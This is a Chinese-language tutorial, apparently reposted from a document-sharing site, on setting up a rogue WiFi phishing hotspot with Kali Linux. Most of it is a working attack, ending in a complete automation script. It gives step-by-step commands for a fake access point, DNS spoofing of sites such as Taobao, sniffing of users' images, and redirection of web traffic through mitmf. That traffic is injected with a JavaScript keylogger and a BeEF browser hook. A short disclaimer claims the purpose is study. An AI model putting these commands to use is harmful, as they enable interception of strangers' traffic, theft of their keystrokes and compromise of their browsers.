利用Kali进行WiFi钓鱼测试实战学习.docx
- 文档编号:7678776
- 上传时间:2023-01-25
- 格式:DOCX
- 页数:10
- 大小:743.01KB
利用Kali进行WiFi钓鱼测试实战学习.docx
《利用Kali进行WiFi钓鱼测试实战学习.docx》由会员分享,可在线阅读,更多相关《利用Kali进行WiFi钓鱼测试实战学习.docx(10页珍藏版)》请在冰豆网上搜索。
利用Kali进行WiFi钓鱼测试实战学习
写在前面
注:
此文具有攻击性,只能用于学习研究之用,禁止用于其他非法用途,否则后果自负.---Mrxn20150612搜集
从至少一年前我就一直想在自己跑kali的笔记本上架个钓鱼热点。
然而由于网上的教程的nat写得有问题,别人写好的脚本和我电脑有些互不待见,最接近成功的一次只做到了qq能聊天,XX都上不去。
而最近忽然意识到了问题的所在,成功实现了建立wifi热点,dns劫持,js注入,图片嗅探,和BEEF结合对用户浏览器进行攻击测试。
故写此文分享给大家,希望与之前的我有一样困惑的同志们能有所收获。
建立热点
工具:
isc-dhcp-server ;Aircrack-ng套件;iptables
建立过程:
首先写dhcp配置文件/etc/dhcp/dhcpd.conf
写入如下内容:
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
range 10.0.0.10 10.0.0.100;
}
这里以10.0.0.1作为网关和dns服务器地址。
然后我们处理无线网卡
ifconfig wlan1 down #wlan1修改成你的网卡
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1
上述命令可以防止出现:
Error:
Gotchannel-1,expectedavalue>0.
然后用airbase建立热点
airbase-ng -e Fishing -c 11 mon0
热点的网络流量会被虚拟到at0这块网卡上面
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
打开ip转发
echo 1 > /proc/sys/net/ipv4/ip_forward
开启dhcp
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start
然后可以试着用手机连接,应该可以连上但上不了网
于是配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #对eth0进行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把无线网卡流量转发到有线网卡(或者什么能上网的网卡)上面
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356 #修改最大报文段长度
注意那第三个命令调整MSS,不加后果很严重(我就一直死在这里)
(这里可能还是DNS错误,请看后文中的dns代理服务器搭建)
劫持DNS
工具:
dnschef
过程:
dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53
上述命令是以ip10.0.0.1(上文中的fakeap网关和DNS的ip)建立dns,对于所有请求转发到210.73.64.1进行解析。
显然这只是个“代理”并没有劫持的功效
于是我们进化:
dnschef --fakedomains=, --fakeip=10.0.0.1 -i 10.0.0.1 --nameserver 210.73.64.1#53
把淘宝和XX解析到本机了。
当然可以把更多规则写在文件里:
剩下的大家自由发挥吧。
p.s:
这个和后文中mitmf冲突,mitmf识别http协议中的目的主机,进行转发,不受这个dns伪造影响。
图片嗅探
这是一个很好玩的功能
工具:
driftnet
过程:
driftnet -i at0
然后程序会打开一个小窗口显示所有传输的图片:
单击图片保存到/
当然可以开启 Adjunctmode:
driftnet -i at0 -a
直接保存图片并显示文件名。
劫持Web流量
这个更好玩
工具:
BEEF;mitmf;iptables
过程:
先把80端口的流量劫持走(这里10000是mitmf默认监听端口)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
然后打开mitmf
mitmf -i at0 --replace --search-str aaaaa --replace-str bbbbb#把所有网页中的aaaaa替换成bbbbb
上图XX了aaaaa
好吧不要恶作剧了,上干货
mitmf -i at0 --inject --js-url http:
//10.0.0.1:
3000/hook.js --jskeylogger
mitmf在这里注入了js键盘记录器
最后用BEEF测试用户浏览器吧!
/usr/share/beef-xss/beef
浏览器打开http:
//127.0.0.1:
3000/ui/panel,初始用户名和密码都是beef
BEEF过于高深我还没玩得很清楚请大家自行探索。
对了,不要忘了抓包
最后是我写的脚本
#清空iptables
iptables -t nat -F
iptables -t nat -X
iptables -t nat -P PREROUTING ACCEPT
iptables -t nat -P POSTROUTING ACCEPT
iptables -t nat -P OUTPUT ACCEPT
iptables -t mangle -F
iptables -t mangle -X
iptables -t mangle -P PREROUTING ACCEPT
iptables -t mangle -P INPUT ACCEPT
iptables -t mangle -P FORWARD ACCEPT
iptables -t mangle -P OUTPUT ACCEPT
iptables -t mangle -P POSTROUTING ACCEPT
iptables -F
iptables -X
iptables -P FORWARD ACCEPT
iptables -P INPUT ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t raw -F
iptables -t raw -X
iptables -t raw -P PREROUTING ACCEPT
iptables -t raw -P OUTPUT ACCEPT
#建立热点
airmon-ng stop mon0
ifconfig wlan1 down #wlan1修改成你的网卡
iwconfig wlan1 mode monitor
ifconfig wlan1 up
airmon-ng start wlan1 &
sleep 2
gnome-terminal -x bash -c "airbase-ng -e Fishing -c 11 mon0" #按需求修改
sleep 2
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 1 > /proc/sys/net/ipv4/ip_forward
#配置dhcp
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
sleep 2
/etc/init.d/isc-dhcp-server start
#nat
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT
iptables -A FORWARD -p tcp --syn -s 10.0.0.0/24 -j TCPMSS --set-mss 1356
#劫持80
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
#劫持dns
gnome-terminal -x bash -c "dnschef -i 10.0.0.1 --nameserver 210.73.64.1#53"
#打开beef并进行80js键盘记录
gnome-terminal -x bash -c "mitmf -i at0 --inject --js-url http:
//10.0.0.1:
3000/hook.js --jskeylogger"
beef-xss
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 利用 Kali 进行 WiFi 钓鱼 测试 实战 学习